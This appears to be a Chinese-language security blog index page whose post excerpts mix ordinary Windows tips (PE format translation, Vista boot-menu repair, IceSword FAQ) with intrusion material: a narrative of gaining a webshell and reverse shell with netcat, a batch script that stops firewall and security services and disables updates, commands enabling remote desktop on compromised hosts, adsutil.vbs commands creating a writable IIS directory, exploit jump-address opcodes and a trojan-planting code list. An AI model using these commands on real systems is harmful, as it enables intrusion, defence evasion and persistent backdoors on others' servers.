利用ORACLE系統賬戶默認口令提升權限(ZT)
摘要:
近日,偶到一主機上逛了一圈。主機的配置還算是安全,偏偏一個比較隱藏的目錄下殘留了upfile.asp,結果輕輕松松的得到了webshell。
接著在主機上逛了逛,拿出superscan從外面掃了下,只開放了80端口。從user\程序目錄里,發現有一快捷方式:firecontrol,好象是某款硬件防火墻的控制臺。WEBSHELL下檢測了下開放的服務,發現一般的可提權的方法都不可行,無SERV-U等等,主機的補丁也是打到了最新。試了下傳了個NC上去,反連接得到一SHELL,這下比在老兵的管理器里舒服多了。
在C盤下看到一個目錄oracle,看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件,確定了主機的服務名“xxx”,看了下版本“oracle 8i”,用數據庫連接器
.............
閱讀全文
命令行添加程序到windows默認防火墻
摘要: @echo off
net stop "Security Center"
net stop SharedAccess
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f
閱讀全文
“PE文件格式”1.9版 完整譯文(附注釋)
摘要: 標 題: 【翻譯】“PE文件格式”1.9版 完整譯文(附注釋)
作 者: ah007
時 間: 2006-02-28,13:32
鏈 接: http://bbs.pediy.com/showthread.php?threadid=21932
$Id: pe.txt,v 1.9 1999/03/20 23:55:09 LUEVELSMEYER Exp $
PE文件格式系列譯文之一----
【翻譯】“PE文件格式”1.9版 完整譯文(附注釋)
=========================================================
原著:Bernd. Luevelsmeyer
翻譯:ah007
[注意:本譯文的所有大小標題序號都是譯者添加,以方便大家閱讀。圓圈內的數字是注釋的編號,其中注釋②譯自微軟的《PECOFF規范》,其它譯自網絡。----譯者]
.........
閱讀全文
腳本加密方法大全(ZT)
摘要: 本文一共介紹了七種方法:
一:最簡單的加密解密
二:轉義字符"\"的妙用
三:使用Microsoft出品的腳本編碼器Script Encoder來進行編碼 (自創簡單解碼)
四:任意添加NUL空字符(十六進制00H) (自創)
...................
閱讀全文
一些opcodes(ZT)
摘要: 近日在寫exploit的時候需要用到一些其他語言的call ebx的跳轉地址,但是metasploit的opcode DB沒有包括繁體中文、日文、韓文機器的跳轉地址,所以費了點時間收集了下,在這里要感謝傲少提供的機器給我去找地址。現在貼到這里,方便大家。
簡體中文windows的通用跳轉地址:(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..............
閱讀全文
開3389的幾種方法(留帖備查)
摘要: 1.打開記事本,編輯內容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好后存為BAT文件,上傳至肉雞,執行。這里值得注意的是要確定winnt是否在c盤,如果在其他盤則需要改動。
...................
閱讀全文
adsutil.vbs
摘要: web 和 數據分離,有Pcanywhere,數據庫服務器有 IIS,
cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一個Web服務的端口
cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir創建一個虛擬目錄wodexi
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/path c:\ 設置路徑
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/accesswrite 1設置寫權限
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi
閱讀全文
掛馬代碼大全(ZT)
摘要: 一:框架掛馬
二:js文件掛馬
首先將以下代碼
document.write("
");
保存為xxx.js,
則JS掛馬代碼為
三:js變形加密
muma.txt可改成任意后綴
.............
閱讀全文
水果機密碼解碼 "密碼公式" 看了就知道怎么打暴機了(ZT)
摘要: 笨驢的老虎機一共有7個賭項,分別是:
bar,賠率50,出現概率1/22(不明白為什么用這個詞,英語達人來講講,偶門家鄉管這個叫大50);
77,賠率30,出現概率1/11;
西瓜,賠率10,出現概率1/11;
星星,賠率8,出現概率3/22;
鈴當,賠率6,出現概率3/22;
木瓜,賠率4,出現概率2/11;
蘋果,賠率2,出現概率3/11;
...................
閱讀全文
用ntfs流隱藏文件(zt)
摘要: 大家把ntfs分區上的文件拷貝到非ntfs分區上時, 可能偶爾遇到過下面的情況, 系統提示會有數據丟失, 這是怎么回事呢?
實際上ntfs文件系統引入了"流"這個概念, 每個文件都可以有多個流, 而我們一般只使用了一個, 通過給文件分配更多的流, 可以實現某種意義上的"文件隱藏". 例如可以控制臺中使用下面的命令建立一個文本文件:
dir d:>abc.txt
............
閱讀全文
冰刃IceSword FAQ 進程、端口、服務篇(ZT)
摘要: 問:現在進程端口工具很多,什么要使用IceSword?
答:1、絕大多數所謂的進程工具都是利用Windows的Toolhlp32或psapi再或ZwQuerySystemInformation系統調用(前二者最終也用到此調用)來編寫,隨便一個ApiHook就可輕輕松松干掉它們,更不用說一些內核級 后門了;極少數工具利用內核線程調度結構來查詢進程,這種方案需要硬編碼,不僅不同
版本系統不同,打個補丁也可能需要升級程序,并且現在有人也提出過防止此
種查找的方法。而IceSword的進程查找核心態方案是目前獨一無二的,并且
充分考慮內核后門可能的隱藏手段,目前可以查出所有隱藏進程。
2、絕大多數工具查找進程路徑名也是通過Toolhlp32、psapi,前者會調用RtlDebug***函數向目標注入遠線程,后者會用調試api讀取目標進程內存,本質上都是對PEB的枚舉,前面我的blog提到過輕易修改PEB就讓這些工具找不到 北了。而IceSword的核心態方案原原本本地將全路徑展示,就算運行時剪切到其他路徑也會隨之顯示。
3、進程dll
閱讀全文
Vista啟動菜單的多個問題
摘要: 經歷了上次的"Acronis os selector 引發系統不能啟動"事件后,我的vista也廢了,恢復過程中碰到多個問題,記錄一下以備查閱
C盤 Windows2003
D盤 Windows Vista
E盤 Ubuntu
F盤 數據,軟件等
我先Ghost恢復了Windows2003,再恢復Ubuntu,由于Vista在Ghost備份之后加了很多東西,夢幻桌面,收音機等很多側邊欄等等的工具,沒有進行Ghost恢復,使用Vista PE啟動光盤啟動,有個修復Vista啟動項的程序,修復重啟(應該是此時生成了BCD數據庫),發現只能進Windows Vista,沒有Windows2003的多啟動菜單了,再次使用Vista PE啟動光盤啟動,修改BCD數據庫文件,執行如下命令
bcdedit /create {ntldr} /d "Windows 2003"
bcdedit /set {ntldr} device partition=C:
bcdedit /set {ntldr} path \ntldr
閱讀全文
更改驅動器號
摘要: HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices
一看就明白
閱讀全文
教你如何雙啟動Windows XP和Windows Vista(ZT)
摘要: 假如你認為安裝一個Windows操作系統不夠用,或者你感覺生活中的麻煩還不夠多,那就同時安裝Windows XP和Windows Vista系統吧。
為什么不呢?坦率的說,我不知道為什么有人想這么做。正如在上一篇博客中提到的那樣,Windows Vista對于MBR(主引導記錄)的支配地位,使得處理器十分排外。一旦電腦上安裝了Vista,用戶 就必須按照Vista制定的規則來操作電腦。
硬盤分區
...........
閱讀全文
解決Vista的多啟動菜單
摘要: 同樣,網上講的,大多數是垃圾
比如C盤有個Win2k3,使用Vista PE啟動,使用命令行執行如下命令
bcdedit /create {ntldr} /d "Windows 2003"
bcdedit /set {ntldr} device partition=C:
bcdedit /set {ntldr} path \ntldr
bcdedit /displayorder {ntldr} -addlast
以上是我碰到的Vista啟動菜單問題的解決方法
............
閱讀全文